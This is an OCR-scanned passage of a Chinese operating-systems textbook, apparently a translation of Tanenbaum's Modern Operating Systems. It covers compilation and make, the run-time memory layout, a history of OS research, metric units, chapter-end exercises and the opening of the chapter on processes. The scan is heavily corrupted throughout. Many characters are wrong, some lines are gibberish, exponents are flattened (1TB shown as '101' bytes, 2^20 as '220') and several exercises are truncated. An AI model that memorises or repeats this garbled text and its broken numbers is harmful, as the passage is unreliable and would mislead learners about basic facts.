将 与 kt+1 之 间 的 较 大 者 存储 在 i 中 。 头 文件 还 可 以 包含 条 件 编译 ， 
例如 


#ifdef PENTIUM 
intel_int_ack(); 
#endif 


如 果 宏 PENTIUM 有 定义 ， 而 不 是 其 他 ， 则 编译 进 对 intel_int_ack 
函数 的 调用 。 为 了 分 割 与 结构 有 关 的 代码 ， 大 量 使 用 了 条 件 编译 ， 这 
样 只 有 当 系 统 在 Pentium 上 编译 时 ， 一 些 特定 的 代码 才 会 被 插入 ， 其 他 
的 代码 仅 当 系统 在 SPARC 等 机 硕 上 编译 时 才 会 插入 。 通 过 使 用 让 nclude 
和 令 ， 一 个 .c 文 件 体 可 以 含有 零 个 或 多 个 头 文件 。 


1.8.3 ”大 型 编程 项 目 


为 了 构建 操作 系统 ， 每 个 .c 被 C 编 译 堪 编译 成 一 个 目标 文件 。 目 标 
文件 使 用 后 级 .o， 含 有 目标 机 器 的 二 进 制 代码 。 它 们 可 以 随后 直接 在 
CPU 上 运行 。 在 C 的 世界 里 ， 没 有 类 似 于 Java 字 节 代 码 的 东西 。 


C 编 译 需 的 第 一 道 称 为 C 预 处 理 右 。 在 它 读 入 每 个 .文件 时 ， 每 当 
过 到 一 个 #include 指 令 ， 它 束 取 来 该 名 称 的 头 文 件 ， 并 加 以 处 理 、 扩 展 
宏 、 处 理 条 件 编译 (以 及 其 他 事务 ， 然 后 将 结果 传递 给 编译 器 的 下 
一 道 ， 念 佛 它们 原先 避 ® 包 含 在 该 文件 中 一 样 。 


由 于 操作 系统 非常 大 (五 百 万 行 代码 是 很 寻常 的 ，， 每 当 文 件 修 
改 后 束 重 新 编译 是 不 能 忍受 的 。 男 一 方面 ， 改 变 了 用 在 成 干 个 文件 中 
的 一 个 关键 头 文件 ， 确 实 需要 重新 编译 这 些 文件 。 没 有 一 定 的 协助 ， 
要 想 记 录 哪 个 目标 文件 与 哪个 头 文件 相关 是 完全 不 可 行 的 。 


幸运 的 是 ， 计 算 机 非常 善于 处 理事 务 分 类 。 在 UNIX 系 统 中 ， 有 个 
名 为 make 的 程序 (其 大 量 的 变 体 如 gmake、pmake 等 ) ， 它 读 入 
Makefile， 该 Makefile 说 明 哪 个 文件 与 哪个 文件 相关 。make 的 作用 十， 
在 构建 操作 系统 二 进 制 码 时 ， 检 查 此 刻 需 要 哪个 目标 文件 ， 而 且 对 于 
每 个 文件 ， 检 查 目 从 上 次 目标 文件 创建 之 后 ， 是 否 有 任何 它 依赖 〈 代 
码 和 头 文 件 ， 的 文件 已 经 被 修改 了 。 如 果 有 ， 目 标 文件 需要 重新 编 


1E o femakeffixe T EA oR ae Za, EVA Com a E 
PER EEC, IPE, TE TEA Ba Bl APRS e EKE 
目 中 ， 创 建 Makefile 是 一 件 容易 出 错 的 工作 ， 所 以 出 现 了 一 些 工具 使 
该 工作 能 够 目 动 完 成 。 


一 旦 所 有 的 .o 文 件 都 已 经 欧 绪 ， 这 些 文件 被 传递 给 称 为 linker 的 程 
序 ， 将 其 组 合成 一 个 单个 可 执行 的 二 进 制 文件 。 此 时 ， 任 何 被 调用 的 
库 函 数 都 已 经 包含 在 内 ， 画 数 之 间 的 引用 都 已 经 解决 ， 而 机 器 地 址 也 
都 按 需 要 分 配 完毕 。 在 linker 完 成 之 后 ， 得 到 一 个 可 执行 程序 ， 在 
UNIX 中 传统 上 称 为 a.out 文 件 。 这 个 过 程 中 的 各 种 部 分 如 图 1-30 所 示 ， 
图 中 的 一 个 程序 包含 三 个 C 文 件 ， 两 个 头 文件 。 这 里 虽然 讨论 的 是 有 
关 操 作 系统 的 开发 ， 但 是 所 有 内 容 对 开发 任何 大 型 程序 而 言 都 是 适用 
的 。 
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1-30 编译 C 和 头 文件 ， 构 建 可 执行 文件 的 过 程 


1.8.4 ”运行 模型 


在 操作 系统 二 进 制 代码 链接 完成 后 ， 计 算 机 束 可 以 重新 启动 ， 狐 
的 操作 系统 开始 运行 。 一 旦 运行 ， 系 统 会 动态 调 入 那些 没有 静态 包括 
在 二 进 制 代码 中 的 模块 ， 诸 如 设备 继 动 和 文件 系统 。 在 运行 过 程 中 ， 
RFRA HEH a PBR, ACRE (程序 代码 ) 、 数 据 段 和 堆栈 
段 。 文 本 段 通 党 是 不 可 改变 的 ， 在 运行 过 程 中 不 可 修改 。 数 据 段 开始 
时 有 一 定 的 大 小 ， 并 用 确定 的 值 进行 初始 化 ， 但 是 随后 束 被 修改 了 ， 
其 大 小 随 需 要 增长 。 堆 栈 段 被 初始 化 为 裤 ， 但 是 随 着 对 函数 的 调用 和 
从 玉 数 返回 ， 堆 栈 段 时 时 刻 刻 在 增长 和 缩小 。 通 第 文本 段 放置 在 接近 
内 存 瓜 部 的 位 置 ， 数 据 段 在 其 上 面 ， 这 样 可 以 同上 增长 。 而 堆栈 段 处 
在 高 位 的 虚拟 地 址 ， 具 有 疝 下 增长 的 能 力 ， 不 过 不 同系 统 的 工作 方式 
各 有 差别 。 


在 所 有 情形 下 ， 操 作 系统 代码 都 是 直接 在 硬件 上 执行 的 ， 不 用 解 
释 器 ， 也 不 钙 即 时 编译 ， 如 Java 通 常 做 的 那样 。 


19 ”有 天 操作 系统 的 研究 


计算 机 科学 古 快 速 发 展 的 领域 ， 很 难 预 测 其 下 一 步 的 发 展 方向 。 
在 大 学 和 产业 研究 实验 室 中 的 研究 人 员 们 始终 在 思考 新 的 思想 ， 这 些 
新 思想 中 的 某 一 些 内 容 并 没有 什么 用 处 ， 但 是 有 些 新 思想 会 成 为 未 来 
产品 的 基石 ， 并 对 产业 界 和 用 户 产 生 广泛 的 影响 。 当 然 ， 事后 解说 什 
么 是 什么 要 比 在 当时 说 明 容 易 得 多 。 将 小 麦 从 穆 子 中 分 离 出 来 古 非常 
困难 的 ， 因 为 一 种 思想 从 出 现 到 形成 影响 常常 需要 20~30 年 。 


例如 ， 当 艾森豪威尔 总 统 在 1958 年 建立 国防 部 高 级 研究 项 目 署 

(ARPA) 时 ， 他 试图 通过 五 角 大 楼 的 研究 预算 来 削弱 海军 和 空军 并 维 
护 陆 军 的 地 位 。 他 并 不 是 想 要 发 明 Internet。 但 是 ARPA 做 的 一 件 事 是 给 
予 一 些 大 学 资助 ， 用 以 研究 模糊 不 清 的 包 交 换 概 念 ， 这 个 研究 很 快 导 
致 了 第 一 个 实验 包 交 换 网 的 建立 ， 即 ARPANET。 该 网 在 1969 年 启用 。 
没有 多 久 ， 其 他 被 ARPA 资 助 的 研究 网 络 也 连接 到 ARPANET 上 ， 于 是 
Internet 竹 生 了 “。Internet 愉 快 地 为 学 术 人 研究 人 员 们 互相 发 送 了 20 年 的 电 
子 邮件 。 到 了 20 世 纪 90 年 代 早 期 ，Tim Berners-Lee 在 日 内 瓦 的 CERN 研 
究 所 发 明了 万 维 网 (World Wide Web) ， 而 Marc Andreesen 在 伊利 诺 伊 
大 学 为 万 维 网 写 了 一 个 图 形 浏览 器 。 突 然 地 ，Internet 上 充满 了 年 青 人 
的 聊天 活动 。 在 知道 了 这 一 切 之 后 ， 艾 森 豪 威 尔 总 统 可 能 气 得 在 他 的 
坟 莫 中 打滚 呢 。 


对 操作 系统 的 研究 也 导致 了 实际 操作 系统 的 戏剧 性 变化 。 正 如 我 
们 较 早 所 讨论 的 ， 第 一 代 商 用 计算 机 系统 都 是 批 处 理 系统 ， 直 到 20 世 
纪 60 年 代 早 期 M.ILT. 发 明了 交互 式 分 时 系统 为 止 。20 世 纪 60 年 代 后 期 ， 
即 在 Doug Engelbart 于 斯 坦 福 研 究 院 发 明 鼠 标 和 图 形 用 户 接口 之 前 ， 所 
有 的 计算 机 都 是 基于 文本 的 。 有 谁 会 知道 下 一 个 发 明 将 会 是 什么 呢 ? 


在 本 小 节 和 本 书 中 相关 的 其 他 章节 中 ， 我 们 会 简要 地 介绍 一 些 在 
过 去 5 至 10 年 中 操作 系统 的 研究 工作 ， 这 是 为 了 让 读者 了 解 可 能 会 出 现 
什么 。 这 个 介绍 当然 不 全 面 ， 而 且 主 要 依据 在 高 水 平 的 期 刊 和 会 议 上 
已 经 发 表 的 文章 ， 因 为 这 些 文章 为 了 得 以 发 表 至 少 需要 通过 严格 的 同 
行 评 估 过 程 。 在 有 关 研 究 内 容 一 节 中 所 引用 的 多 数 文章 ， 它 们 或 者 发 
表 在 ACM 刊 物 、IEEE 计 算 机 协会 刊物 或 者 USENIX 刊 物 上 ， 并 对 这 些 

组 织 的 (学生 ) 成 员 们 在 Internet 上 开放 。 有 关 这 些 组 织 的 更 多 信息 以 
及 它们 的 数字 图 书馆 ， 可 以 访问 : 


ACM http://www.acm.org 
IEEE Computer Society http://www.computer.org 
USENIX http://www.usenix.org 


实际 上 ， 所 有 的 操作 系统 研究 人 员 都 认识 到 ， 目 前 的 操作 系统 中 
一 个 大 的 、 不 灵活 、 不 可 靠 、 不 安全 和 带 有 错误 的 系统 ， 而 且 特 定 的 
某 个 操作 系统 较 其 他 的 系统 有 更 多 的 错误 〈 这 里 略 去 了 名 称 以 避免 届 
任 ) 。 所 带 来 的 结果 是 ， 大 量 的 研究 集中 于 如 何 构造 更 好 的 操作 系 


统 。 近 来 出 版 的 文献 有 如 下 一 些 ， 关 于 新 操作 系统 (Krieger 等 人 ， 
2006) ， 操 作 系统 结构 (Fassino A, 2002) ， 操 作 系 统 正确 性 
(Elphinstone 等 人 ，2007; Kumar 和 Li，2002; Yang 等 人 ，2006) ， 操 
作 系 统 可 靠 性 (Swift 等 人 ，2006; LeVasseur 等 人 ，2004) ， 虚 拟 机 
(Barham 等 人 ，2003; Garfinkel 等 人 ，2003; King 等 人 ，2003; 
Whitaker 等 人 ，2002) ， 病 毒 和 蠕虫 (Costa 等 人 ，2005; Portokalidis 等 
人 ，2006; Tucek 等 人 ，2007; Vrable 等 人 ，2005) ， 错 误 和 排 错 
(Chou 等 人 ，2001; King 等 人 ，2005) ， 超 线程 与 多 线程 

(Fedorova, 2005; Bulpin 和 Pratt，2005) ， 用 户 行为 (Yu 等 人 ， 
2006) ， 以 及 许多 其 他 课题 。 


1.10 ”本 书 其 他 部 分 概要 


我 们 已 经 叙述 完毕 引 论 ， 并 且 描 绘 了 乌 隔 式 的 操作 系统 图 景 。 现 
在 是 进入 具体 细 市 的 时 候 了 。 正 如 前 面 已 经 叙述 的 ， 从 程序 员 的 观点 
来 看 ， 操 作 系 统 的 基本 目的 是 提供 一 些 关 键 的 抽象 ， 其 中 最 重要 的 是 
进程 和 线程 、 地 址 空间 以 及 文件 。 所 以 后 面 三 草 剖 是 有 关 这 些 关 键 主 
题 的 。 


第 
章 还 给 出 了 大 量 关 于 进程 间 如 何 通信 的 例子 以 及 如 何 避 免 某 些 错 


第 3 草 具 体 讨论 地 址 空间 以 及 关联 的 内 存 管理 。 讨 论 虚 拟 内 存 等 重 
要 课题 ， 以 及 相关 的 概念 ， 如 页 面 处 理 和 分 段 等 。 


第 4 章 里 ， 我 们 会 讨论 有 天文 件 系 统 的 所 有 重要 内 容 。 在 茶 种 程度 
上 ， 用 户 大 量 看 到 的 是 文件 系统 。 我 们 将 研究 文件 系统 接口 和 文件 系 
统 的 实现 。 


输入 /输出 是 第 5 章 的 内 容 。 这 一 章 介绍 设备 独立 性 和 设备 依赖 性 


的 概念 。 将 把 大 干 重要 的 设备 ， 包 括 磁 一 、 键 盘 以 及 显示 设备 作为 示 
例 讲 解 。 


第 6 章 讨论 死 锁 。 在 这 一 章 中 我 们 概要 地 说 明 什 么 是 死 锁 ， 不 过 这 
章 里 有 大 量 的 内 容 需 要 介绍 。 还 讨论 了 避免 死 锁 的 方法 。 


到 此 ， 我 们 完成 了 对 单 CPU 操 作 系 统 基 本 原理 的 学 习 。 不 过 ， 还 
有 更 多 的 高 级 内 容 要 和 拆 述 。 在 第 7 革 里 ， 我 们 将 了 解 多 媒体 系统 ， 这 类 
系统 的 大 量 特性 和 要 求 与 传统 的 操作 系统 存在 着 差别 。 而 在 其 他 的 篇 
幅 里 ， 我 们 会 讨论 多 巡 体 的 本 质 对 调度 处 理 和 文件 系统 的 影响 。 邦 一 
个 高 级 课题 是 多 处 理 器 系统 ， 包 括 多 处 理 右 、 并 行 计算 机 以 及 分 布 式 
系统 。 这 些 内 容 放 在 第 8 章 中 讨论 。 


有 一 个 非常 重要 的 主题 ， 束 是 操作 系统 安全 ， 它 是 第 9 章 的 内 容 。 
在 这 一 章 中 讨论 的 内 容 涉及 威胁 (例如 ， 病 毒 和 蠕虫 )、 保 护 机 制 以 


随后 ， 我 们 安排 了 一 些 实际 操作 系统 的 案例 。 它 们 是 Linux (第 10 
=.) ` Windows Vista 〈 第 11 章 ) 以 及 Symbian 〈 第 12 章 ) 。 本 书 以 第 
13 草 关于 操作 系统 设计 的 一 些 思 考 作 为 结束 。 


1.11 公制 单位 


为 了 避免 混乱 ， 有 必要 在 本 书 中 特别 指出 ， 考 虑 到 计算 机 科学 的 
通用 性 ， 所 以 我 们 采用 公制 以 代替 传统 的 英制 。 在 图 1-31 中 列 出 了 主要 
的 公制 前 级 。 前 缀 用 首 字 缩 写 而 成 ， 几 是 单位 大 于 1 的 首 字 母 均 大 写 。 
这 样 ， 一 个 1TB 的 数据 库 占 据 了 101 字 节 的 存储 空间 ， 而 100 psec (或 
100ps) 的 时 钟 每 隔 10-10 s 的 时 间 滴 答 一 次 。 由 于 mili 和 micro 均 以 字 
母 “m” 开 头 ， 所 以 必须 作出 区 分 两 者 的 选择 。 通 常 ， 用 “m” 表 示 milli， 
而 用 “ph”( 希 腊 字 母 mu) 表示 micro 。 


| 指数 具体 表示 前 级 | HR | 具体 表示 WA | 

| 103 | 0.001 oo [mm [10° | 1.000 | Kilo 
10° | 0.000001 micro f 10° Ooo 1 000 000 | Mega 
10 | 0.000000001 | nano f 10° | ae 1 000 000 000 | Giga 

107? | 0.000000000001 pico |‖ 10% 1 000 000 000 000 | Tera 
10-15 | 0.000000000000001 femto | 10% [ = 1.000 000 000 000 000 | Peta 
10 | 0.0000000000000000001 atto f 10% 1 000 000 000 000 000 000 | Exa | 
10" | 0.0000000000000000000001 | zepto f 10” 1 000 000 000 000 000 000 000 | Zetta 
10 | 0.0000000000000000000000001 | yocto f 10% | 1000 000 000 000 000 000 000 000 | Yotta | 


图 1-31 主要 的 公制 前 级 


这 里 需要 说 明 的 还 有 关于 存储 器 容量 的 度量 ， 在 通常 的 工业 实践 

中 ， 各 个 单位 的 含义 稍 有 不 同 。 这 里 Kilo 表 示 220 (1024) 而 不 是 103 
(1000) ， 因 为 存储 器 总 是 2 的 需 。 这 样 IKB 存 储 器 就 有 1024 个 字 节 ， 
而 不 是 1000 个 字 节 。 类 似 地 ，1MB 存 储 器 有 220 (1048576) 个 字 节 ， 


1GB 存 储 器 有 239 (1 073 741 824) 个 字 节 。 但 是 ，1Kbps 的 通信 线路 每 


秒 传送 1000 个 位 ， 而 10Mbps 的 局 域 网 在 10 000 000 位 / 秒 的 速率 上 运 
行 ， 因 为 这 里 的 速率 不 是 2 的 需 。 很 不 储 ， 许 多 人 倾 回 于 将 这 两 个 系统 
混 消 ， 竺 别 是 混 消 关于 磁盘 容量 的 度量 。 在 本 书 中 ， 为 了 避免 舍 糊 ， 
我 们 使 用 KB、MB 和 GB 分 别 表示 210 字 节 220 字 节 和 230 字 节 ， 而 用 符号 


Kbps、Mbps 和 Gbps 分 别 表 示 103bps、108bps 和 10”bps。 
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考察 操作 系统 有 两 种 观点 : 资源 管理 观点 和 扩展 的 机 器 观点 。 在 
资源 管理 的 观点 中 ， 操 作 系统 的 任务 是 有 效 地 管理 系统 的 各 个 部 分 。 
在 扩展 的 机 器 观点 中 ， 系 统 的 任务 是 为 用 户 提 供 比 实际 机 右 更 便于 运 
用 的 抽象 。 这 些 抽 象 包括 进程 、 地 址 空间 以 及 文件 。 


操作 系统 的 历史 很 长 ， 从 操作 系统 开始 礁 代 操作 人 员 的 那天 开 
始 ， 到 现代 多 道 程序 系统 ， 主 要 包括 早期 批 处 理 系统 、 多 道 程序 系统 
以 及 个 人 计算 机 系统 。 


由 于 操作 系统 同 硬件 的 交互 密切 ， 掌 握 一 些 硬件 知识 对 于 理解 它 
们 是 有 花 的 。 计 算 机 由 处 理 锅 、 存 储 做 以 及 IO 设备 组 成 。 这 些 部 件 通 


过 已 线 和 连接 “ 


所 有 操作 系统 构建 所 依赖 的 基本 概念 是 进程 、 存 储 管理 、IO 管 
理 、 文 件 管理 和 安全 。 这 些 内 容 都 将 用 后 续 的 一 章 来 讲述 。 


任何 操作 系统 的 核心 是 它 可 处 理 的 系统 调用 集 。 这 些 系统 调用 真 
实地 说 明了 操作 系统 所 做 的 工作 。 对 于 UNIX， 我 们 已 经 考察 了 四 组 系 
统 调用 。 第 一 组 系统 调用 同 进程 的 创建 和 终结 有 关 ; 第 二 组 用 于 读 写 
文件 ， 第 三 组 用 于 目录 管理 ， 第 四 组 包括 各 种 杂项 调用 。 


PRE RSE A IVA ZM o BLA UA AS ` EKA ` 
微 内 核 系 统 、 客 户 机 -服务 器 系统 、 虚 拟 机 系统 和 外 核 系统 。 


习题 


1. 什 么 是 多 道 程 序 设计 ? 


2. 什 么 是 SPOOLing? 读者 是 否认 为 将 来 的 高 级 个 人 计算 机 会 把 
SPOOLing 作 为 标准 功能 ? 


3. 在 早期 计算 机 中 ， 每 个 字 市 的 读 写 直接 由 CPU 人 处理 ( 即 没 有 
DMA) 。 对 于 多 道 程序 而 言 这 种 组 织 方 式 有 什么 含义 ? 


4. 系 列 计 算 机 的 思想 在 20 世 纪 60 年 代 由 IBM 引 入 进 System/360 大 型 
机 。 现 在 这 种 思想 已 经 消亡 了 还 是 继续 活跃 着 ? 


5. 绥 慢 采 用 GUI 的 一 个 原因 是 支持 它 的 硬件 的 成 本 CB) 。 为 了 
支持 25 行 80 列 字符 的 单 色 文本 屏幕 应 该 需要 多 少 视频 RAM? 对 于 
1024x768 像 素 24 位 色彩 位 图 需要 多 少 视频 RAM? 在 1980 年 ($5/KB) 这 


些 RAM 的 成 本 是 多 少 ? 现在 它 的 成 本 是 多 少 ? 


6. 在 建立 一 个 操作 系统 时 有 几 个 设计 目的 ， 例 如 资源 利用 、 及 时 
性 、 健 壮 性 等 。 请 列举 两 个 可 能 互相 矛盾 的 设计 目的 。 


7. 下 面 的 哪 一 条 指令 只 能 在 内 核 态 中 使 用 ? 


a) 茶 止 所 有 的 中 断 。 


b) 读 日 期 -时 间 时 钟 。 
co) 设置 日 期 -时 间 时 钟 。 
d) 改 变 存 储 器 映像 。 


8. 考 虑 一 个 有 两 个 CPU 的 系统 ， 并 且 每 一 个 CPU 有 两 个 线程 ( 超 
线程 ) 。 假 设 有 三 个 程序 P0，P1，P2， 分 别 以 和 运行 时 间 5ms，10ms， 
20ms 开 始 。 运 行 这 些 程序 需要 多 少时 间 ? 假设 这 三 个 程序 都 是 100% 限 
于 CPU， 在 运行 时 无 阻塞 ， 并 且 一 旦 设 定 就 不 改变 CPU。 


9 一 台 计 算 机 有 一 个 四 级 流水 线 ， 每 一 级 都 花费 相同 的 时 间 执 行 


其 工作 ， 即 lns。 这 人 台 机 器 每 秒 可 执行 多 少 条 指令 ? 


10. 假 设 一 个 计算 机 系统 有 高 速 缓存 、 内 存 (RAM) URREN, PR 
作 系统 用 虚拟 内 存 。 读 取 缓 存 中 的 一 个 词 需要 2ns，RAM 需 要 10ns, 做 
盘 需 要 10ms。 如 果 缓 存 的 命中 率 是 95%， 内 存 的 是 〈 缓 存 失效 时 ) 
99%， 读 取 一 个 词 的 平均 时 间 钙 多 少 ? 


11. 一 位 校对 人 员 注 意 到 在 一 部 将 要 出 版 的 操作 系统 教科 书 手稿 中 
有 一 个 多 次 出 现 的 拼写 错误 。 这 本 书 大 致 有 700 页 。 每 页 50 行 ， 一 行 80 
个 字符 。 若 把 文稿 用 电子 扫描 ， 那 么 ， 主 副本 进入 图 1-9 中 的 每 个 存储 
系统 的 层次 要 花费 多 少时 间 ? 对 于 内 存储 方式 ， 考 虑 所 给 定 的 存 取 时 
间 是 每 次 一 个 字符 ， 对 于 磁盘 设备 ， 假 定 存 取 时 间 是 每 次 一 个 1024 字 


FIRR, MATR, BEIRT Tal Jara ee ATT A ee ak 
时 间 相 同 。 


12. 在 有 用户 程 序 进行 一 个 系统 调用 ， 以 读 写 磁盘 文件 时 ， 该 程序 提 
供 指示 说 明了 所 需要 的 文件 ， 一 个 指向 数据 缓冲 区 的 指针 以 及 计数 。 
然后 ， 控 制 权 转 给 操作 系统 ， 它 调用 相关 的 驱动 程序 。 假 设 驱 动 程序 
局 动 磁 副 并 且 直 到 中 断 发 生 才 终 止 。 在 从 磁盘 读 的 情况 下 ， 很 明显 ， 
调用 者 会 被 阻塞 〈 因 为 文件 中 没有 数据 ) 。 在 向 磁 副 写 时 会 发 生 什么 
情况 ”需要 把 调用 者 阻塞 一 直 等 到 磁盘 传送 完成 为 止 吗 ? 


13. 什 么 是 陷阱 指令 ? 在 操作 系统 中 解释 它 的 用 途 。 
14. 陷 阱 和 中 断 的 主要 差别 是 什么 ? 


15 .在 分 时 系统 中 为 什么 需要 进程 表 ? 在 只 有 一 个 进程 存在 的 个 人 
计算 机 系统 中 ， 该 进程 控制 整个 机 器 直到 进程 结束 ， 这 种 机 器 也 需要 
进程 表 吗 ? 


16. 说 明 有 没有 理由 要 在 一 个 非 空 的 目录 中 安装 一 个 文件 系统 ? 如 
果 要 这 样 做 ， 如 何 做 ? 


17. 在 一 个 操作 系统 中 系统 调用 的 目的 是 什么 ? 


18. 对 于 下 列 系统 调用 ， 给 出 引起 失败 的 条 件 : fork ` exec K 


unlink ° 


19. 在 


count=write(fd,buffer,nbytes); 


调用 中 ， 能 在 count 中 而 不 是 nbytes 中 返回 值 吗 ? 如 果 能 ， 为 什 
L? 


20. 有 一 个 文件 ， 其 文件 描述 符 是 fd， 内 含 下 列 字 节 序 列 : 3, 1, 
4，1，5，9，2，6，5，3，5。 有 如 下 系统 调用 : 

lseek(fd,3,SEEK_SET); 

read(fd, &buffer,4); 

其 中 lseek 调 用 寻找 文件 中 的 字 节 3。 在 读 操作 完成 之 后 ，buffer 中 
的 内 容 是 什么 ? 


21. 假 设 一 个 10MB 的 文件 存在 磁 如 连续 局 区 的 同一 个 轨道 上 ( 轨 
道 号 : 50) 。 人 磁盘 的 磁头 辟 此 时 位 于 第 100 号 轨道 。 要 想 从 磁盘 上 找 回 
这 个 文件 ， 需 要 多 长 时 间 ? 假设 磁头 营 从 一 个 柱 面 移 动 到 下 一 个 柱 面 
需要 1ms， 当 文件 的 开始 部 分 存储 在 的 局 区 旋转 到 磁 尖 下 需要 5ms， 并 


旦 读 的 速率 是 100MB/s ° 


22. 块 符 殊 文 件 和 字符 特殊 文件 的 基本 差别 是 什么 ? 


23. 在 图 1-17 的 例子 中 库 调 用 称 为 read， 而 系统 调用 上 自身 称 为 read 。 
这 两 者 都 有 相同 的 名 字 是 正常 的 吗 ? 如 果 不 是 ， 哪 一 个 更 重要 ? 


24. 在 分 布 式 系统 中 ， 客 户 机 -服务 器 模式 很 普 届 。 这 种 模式 能 用 
在 单个 计算 机 的 系统 中 吗 ? 


25. 对 程序 员 而 言 ， 系 统 调 用 就 像 对 其 他 库 过 程 的 调用 一 样 。 有 无 
必要 让 程序 员 了 解 哪 一 个 库 过 程 导致 了 系统 调用 ? 在 什么 情形 下 ， 为 
ITA? 


26. 图 1-23 说 明 有 一 批 UNIX 的 系统 调用 没有 与 之 相等 价 的 Win32 
API。 对 于 所 列 出 的 每 一 个 没有 Win32 等 价 的 调用 ， 若 程序 员 要 把 一 个 
UNIX 程 序 转换 到 Windows 下 运行 ， 会 有 什么 后 果 ? 


27. 可 移植 的 操作 系统 是 能 从 一 个 系统 体系 结构 到 另 一 个 体系 结构 
的 移动 不 需要 任何 修改 的 操作 系统 。 请 解释 为 什么 建立 一 个 完全 可 移 
植 性 的 操作 系统 是 不 可 行 的 。 描 述 一 下 在 设计 一 个 高 度 可 移植 的 操作 
系统 时 你 设计 的 高 级 的 两 层 是 什么 样 的 。 


28. 请 解释 在 建立 基于 微 内 核 的 操作 系统 时 策略 与 机 制 的 分 离 市 来 
的 好 处 。 


29. 下 面 是 单位 转换 的 练习 : 


AS, 


bDK ft PRA micron ° J A gigamicronze 4 K? 
co)1TB 存 储 器 中 有 多 少 字 市 ? 
d) 地 球 的 质量 是 6000 yottagram， 换 算 成 kilogram 是 多 少 ? 


30. 写 一 个 和 图 1-19 类 似 的 shell， 但 是 包含 足够 的 实际 可 工作 的 代 
这 样 读 者 可 测试 它 。 读 者 还 可 以 添加 有 某 些 功能 ， 如 输入 输出 重 定 


` 管道 以 及 后 全 作业 等 。 


31. 如 果 读 者 拥有 一 个 个 人 UNIX 类 操作 系统 (Linux ` MINIX ` 


Free BSD 等 ) ， 可 以 安全 地 裔 省 和 再 局 动 ， 请 写 一 个 可 以 试图 创建 一 
个 无 限制 数量 子 进程 的 shell 脚 本 并 观察 所 发 生 的 事 。 在 运行 实验 之 


前 ， 


通过 shell 键 入 sync， 在 人 磁 弄 上 备 好 文件 缓 神 区 以 避免 毁坏 文件 系 
CER: 在 没有 得 到 系统 管理 员 的 允许 之 前 ， 不 要 在 分 时 系统 上 进 


一 尝试 。 其 后 果 将 会 立即 发 生 ， 演 试 者 可 能 会 被 抓 住 并 受到 惩 


32. 用 一 个 类 似 于 UNIX od 或 MS-DOS DEBUG 的 程序 考察 并 党 试 解 


释 UNIX 类 系统 或 Windows 的 目录 。 提 示 : 如 何 进行 取决 于 OS 人 允许 做 


(nn 
X, 


-PERNAR ETE TSE PERE AR KE BE FA 
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数据 。 


第 2 章 ”进程 与 线程 


从 本 章 开始 我 们 将 深入 考察 操作 系统 是 如 何 设计 和 构造 的 。 操 作 
系统 中 最 核心 的 概念 是 进程 : 这 是 对 正在 运行 程序 的 一 个 抽象 。 操 作 
系统 的 其 他 所 有 内 容 都 是 围绕 着 进程 的 概念 展开 的 ， 所 以 ， 让 操作 系 
统 的 设计 者 KFE) 尽早 并 透彻 地 理解 进程 是 非常 重要 的 。 


进程 是 操作 系统 提供 的 最 古老 的 也 是 最 重要 的 抽象 概念 之 一 。 即 
使 可 以 利用 的 CPU 只 有 一 个 ， 但 它们 也 支持 A) 并 发 操作 的 能 
它们 将 一 个 单独 的 CPU 变 换 成 多 个 虚拟 的 CPU。 没 有 进程 的 抽象 ， 现 
代 计 算 将 不 复 存 在 。 在 本 章 里 我 们 会 通过 大 量 的 细节 去 探究 进程 ， 以 
及 它们 的 第 一 个 杀 威 一 一 线程 。 


2.1 进程 


所 有 现代 的 计算 机 经 常会 在 同一 时 间 做 许多 件 事 。 习 惯 于 在 个 人 
计算 机 上 工作 的 人 们 也 许 不 会 十 分 注意 这 个 事实 ， 因 此 列举 一 些 例子 
可 以 更 清 区 地 说 明 这 一 问题 。 先 考虑 一 个 网 络 服务 厂 。 从 各 处 进入 一 
些 网 页 请 求 。 当 一 个 请 求 进 入 时 ， 服 务 器 检查 是 否 其 需要 的 网 页 在 绥 
存 中 。 如 末 是 ， 则 把 网 页 发 送 回 去 ， 如 素 不 是 ， 则 局 动 一 个 位 副 请 求 
以 获取 网 页 。 然 而 ， 从 CPU 的 角度 来 看 ， 磁 副 请 求 需要 漫长 的 有 时间。 
当 等 等 磁盘 请 求 完成 时 ， 其 他 更 多 的 请 求 将 会 进入 。 如 有 果 有 多 个 人 磁盘 


存在 ， 会 在 满足 第 一 个 请 求 之 前 束 接 二 连 三 地 对 其 他 的 磁盘 发 出 一 些 
或 所 有 的 请 求 。 很 明显 ， 需 要 一 些 方法 去 模拟 并 控制 这 种 并 发 。 进 程 
(特别 是 线程 ， 在 这 里 就 可 以 产生 作用 。 


现在 考虑 只 有 一 个 用 户 的 PC。 一 般 用 户 不 知道 ， 当 启动 系统 时 ， 
会 秘密 启动 许多 进程 。 例 如 ， 局 动 一 个 进程 用 来 等 竺 进入 的 电子 邮 
件 ， 或 者 启动 男 一 个 防 病 毒 进程 周期 性 地 检查 是 否 有 新 的 有 效 的 病毒 
定义 。 男 外 ， 菜 个 用 户 进 程 也 许 会 在 所 有 用 户 上 网 的 时 候 打 印 文件 以 
及 烧 录 CD-ROM。 所 有 的 这 些 活动 需要 管理 ， 于 是 一 个 文 持 多 进程 的 
多 道 程序 系统 在 这 里 就 显得 很 有 用 了 。 


在 任何 多 道 程序 设计 系统 中 ，CPU 由 一 个 进程 快速 切换 至 另 一 个 
进程 ， 使 每 个 进程 各 运行 儿 十 或 几 百 个 毫秒 。 严 格 地 说 ， 在 某 一 个 瞬 
间 ，CPU 只 能 运行 一 个 进程 。 但 在 1 秒 钟 期 间 ， 它 可 能 运行 多 个 进程 ， 
这 样 束 产 生 并 行 的 销 觉 。 有 了 时 人 们 所 说 的 伪 并 行 整 古 指 这 种 情形 ， 以 
此 来 区 分 多 处 理 器 系统 〈 该 系统 有 两 个 或 多 个 CPU 共享 同一 个 物理 内 
F) 的 真正 硬件 并 行 。 人 们 很 难 对 多 个 并 行 活动 进行 跟踪 。 因 此 ， 经 
过 多 年 的 努力 ， 操 作 系 统 的 设计 者 发 展 了 用 于 描述 并 行 的 一 种 概念 模 
型 (顺序 进程 ，， 使 得 并 行 更 容易 处 理 。 有 关 该 模型 、 它 的 使 用 以 及 
它 的 影响 正 是 本 章 的 主题 。 


2.1.1 进程 模型 


在 进程 模型 中 ， 计 算 机 上 所 有 可 运行 的 软件 ， 通 常 也 包括 操作 系 

统 ， 被 组 织 成 若干 顺序 进程 (sequential process) ， 人 简称 进程 

(process) 。 一 个 进程 就 是 一 个 正在 执行 程序 的 实例 ， 包 括 程 序 计 数 
器 、 寄 存 器 和 变量 的 当前 值 。 从 概念 上 说 ， 每 个 进程 拥有 它 自己 的 虚 
